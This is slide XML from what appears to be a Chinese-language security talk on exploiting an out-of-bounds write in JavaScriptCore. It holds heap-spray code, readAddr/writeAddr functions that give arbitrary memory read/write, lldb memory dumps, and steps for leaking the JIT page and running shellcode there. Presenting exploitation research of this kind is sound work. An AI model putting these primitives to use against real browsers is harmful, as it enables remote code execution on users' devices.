              <a:rPr lang="it-IT" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x139900080: 0x0000000000000000 0x00000001892ed660 0x000000011e757fc0 0x0000000000000000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274721" y="4325540"/>
            <a:ext cx="11277003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FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lldb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) x -f p -c 40 0x0000000139b00000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x139b00000: 0x0000015721212121 0x0000000000000000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x0000000000000000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0x0000000000000000</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x139b00020: 0x0000000000000000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x0000000000000000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0x0000000000000000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0x0000000000000000</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x139b00040: 0x4141414141414141 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x4141414141414141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0x4141414141414141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0x4141414141414141</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x139b00060: 0x4141414141414141 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x4141414141414141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0x4141414141414141</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x4141414141414141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46734" y="2884930"/>
            <a:ext cx="811918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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>--------------------------------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.. | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>propY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>propX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> | length | elem0 | elem1 | elem2 | ..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>--------------------------------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>                            </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p: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41592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把越界写转化为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AAR/AAW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807536" y="1183342"/>
            <a:ext cx="822888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 smtClean="0"/>
              <a:t>新建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Uint32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Ar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>ray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>，当漏洞触发后可以用来</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>AAR/AAW</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>initBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>=new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>ArrayBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>(0x80);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>attempts=new Array(1250000);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>for(var i=0;i&lt;attempts.length;i++){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>    attempts[i]=new Uint32Array(initBuffer);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>}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914124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8565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01.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>把越界读写转化为任意地址读写漏洞（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AAW/AAR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）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55700" y="1254675"/>
            <a:ext cx="5218206" cy="25237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/>
              <a:t>function readAddr(lowaddr){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>    attempts[750000][4]=lowaddr;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>    var lowval=attempts[750001][0];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>    return lowval;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p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-1299882" y="3778443"/>
            <a:ext cx="1375185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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>	(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>lldb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>) x -f p 0x18cf53880(Uint32Array)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>结构，大小</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>0x20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>字节</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>0x18cf53880: 0x00082a00000001ee 0x000000018cf4da38 0x000000018cf538a0 0xffff000031313131</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>		0x18cf538a0: 0x00082a00000001ee 0x000000018cf4da48 0x0000000125887900 0x0000000200000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071987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88272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把越界读写漏洞转化为任意地址读写漏洞（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AAW/AAR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）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255058" y="1359531"/>
            <a:ext cx="872265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/>
              <a:t>function writeAddr(highaddr,lowaddr,highval,lowval){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>    attempts[750000][4]=lowaddr;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>    attempts[750000][5]=highaddr;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>    attempts[750001][0]=lowval;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>    attempts[750001][1]=highval;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1470212" y="4371672"/>
            <a:ext cx="1323190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 smtClean="0"/>
              <a:t>                              (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>lldb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>) x -f p 0x18cf53880(Uint32Array)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>结构，大小</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>0x20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>字节</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>0x18cf53880: 0x00082a00000001ee 0x000000018cf4da38 0x000000018cf538a0 0xffff000031313131</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>		0x18cf538a0: 0x00082a00000001ee 0x000000018cf4da48 0x0000000125887900 0x0000000200000</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="20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276331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699" y="409575"/>
            <a:ext cx="45727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劫持控制流，执行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shellcode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155699" y="1483224"/>
            <a:ext cx="96109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Menlo-Regular"/>
              </a:rPr>
              <a:t>泄露</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Menlo-Regular"/>
              </a:rPr>
              <a:t>JIT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Menlo-Regular"/>
              </a:rPr>
              <a:t>地址，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Menlo-Regular"/>
              </a:rPr>
              <a:t>copy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Menlo-Regular"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Menlo-Regular"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Menlo-Regular"/>
              </a:rPr>
              <a:t>去执行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="Menlo-Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Menlo-Regular"/>
              </a:rPr>
              <a:t>JS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Menlo-Regular"/>
              </a:rPr>
              <a:t>JIT generated code  000039406c001000-0000394074000000 [128.0M] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Menlo-Regular"/>
              </a:rPr>
              <a:t>rwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Menlo-Regular"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Menlo-Regular"/>
              </a:rPr>
              <a:t>rwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Menlo-Regular"/>
              </a:rPr>
              <a:t> SM=PRV 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55699" y="2805953"/>
            <a:ext cx="858150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Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How to find JIT page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> with AAR?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="ArialMT"/>
              </a:rPr>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>At </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>JavaScriptCore`JSC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>startOfFixedExecutableMemoryPool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61854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27349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</a:rPr>
              <a:t>信息泄露</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JIT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>地址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807535" y="1408383"/>
            <a:ext cx="1038041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b="1" dirty="0">
                <a:latin typeface="Menlo-Bold"/>
              </a:rPr>
              <a:t>(lldb) x -f p -c 20 0x0000000125a27020</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" dirty="0">
                <a:latin typeface="Menlo-Regular"/>
              </a:rPr>
              <a:t>0x125a27020: 0x0000000125a005a8 0x0000000000000000 0x0000000000000000 0x0000000000000000</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" dirty="0">
                <a:latin typeface="Menlo-Regular"/>
              </a:rPr>
              <a:t>0x125a27040: 0x0000000000000000 0x0000000000000000 0x0000000000000000 0x0000000125a00000</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" altLang="zh-CN" dirty="0"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50536" y="2596469"/>
            <a:ext cx="1070016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altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Menlo-Bold"/>
              </a:rPr>
              <a:t>(lldb) x -f p -c 20 0x0000000125a005a8</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" dirty="0">
                <a:latin typeface="Menlo-Regular"/>
              </a:rPr>
              <a:t>0x125a005a8: 0x000000011dbe6650 0x0000000125a000e0 0x0000000123fee3a0 0x0000000000000100</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" dirty="0">
                <a:latin typeface="Menlo-Regular"/>
              </a:rPr>
              <a:t>0x125a005c8: 0x0000000123ef6a20 0x0000000123f9fc60 0x0000000123ef65a0 0x0000000123f2e360</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" altLang="zh-CN" dirty="0">
              <a:effectLst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26919" y="4151584"/>
            <a:ext cx="1074164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latin typeface="Menlo-Bold"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="Menlo-Bold"/>
              </a:rPr>
              <a:t>lldb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Menlo-Bold"/>
              </a:rPr>
              <a:t>) image lookup --address 0x000000011dbe6650</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Menlo-Regular"/>
              </a:rPr>
              <a:t>      Address: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Menlo-Regular"/>
              </a:rPr>
              <a:t>JavaScriptCore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Menlo-Regular"/>
              </a:rPr>
              <a:t>[0x0000000001b91650] (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Menlo-Regular"/>
              </a:rPr>
              <a:t>JavaScriptCore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Menlo-Regular"/>
              </a:rPr>
              <a:t>.__DATA.__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Menlo-Regular"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Menlo-Regular"/>
              </a:rPr>
              <a:t> + 137088)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Menlo-Regular"/>
              </a:rPr>
              <a:t>      Summary: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Menlo-Regular"/>
              </a:rPr>
              <a:t>JavaScriptCore`vtable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Menlo-Regular"/>
              </a:rPr>
              <a:t> for JSC::Subspace + 16</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:effectLst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394117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60322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</a:rPr>
              <a:t>Exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>执行速度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vs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>执行速度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98494" y="1389529"/>
            <a:ext cx="8824211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err="1" smtClean="0"/>
              <a:t>Heapspray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>时，我一共申请了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>0x600</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>1MB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>的堆块，总共大约</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>1.5GB</a:t>
            </a:r>
          </a:p>
          <a:p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zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>主线程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>执行到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>执行时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>337MB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>内存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en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>主线程执行了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>0x8f9a000/2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>条汇编指令，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>1174MB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>内存</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
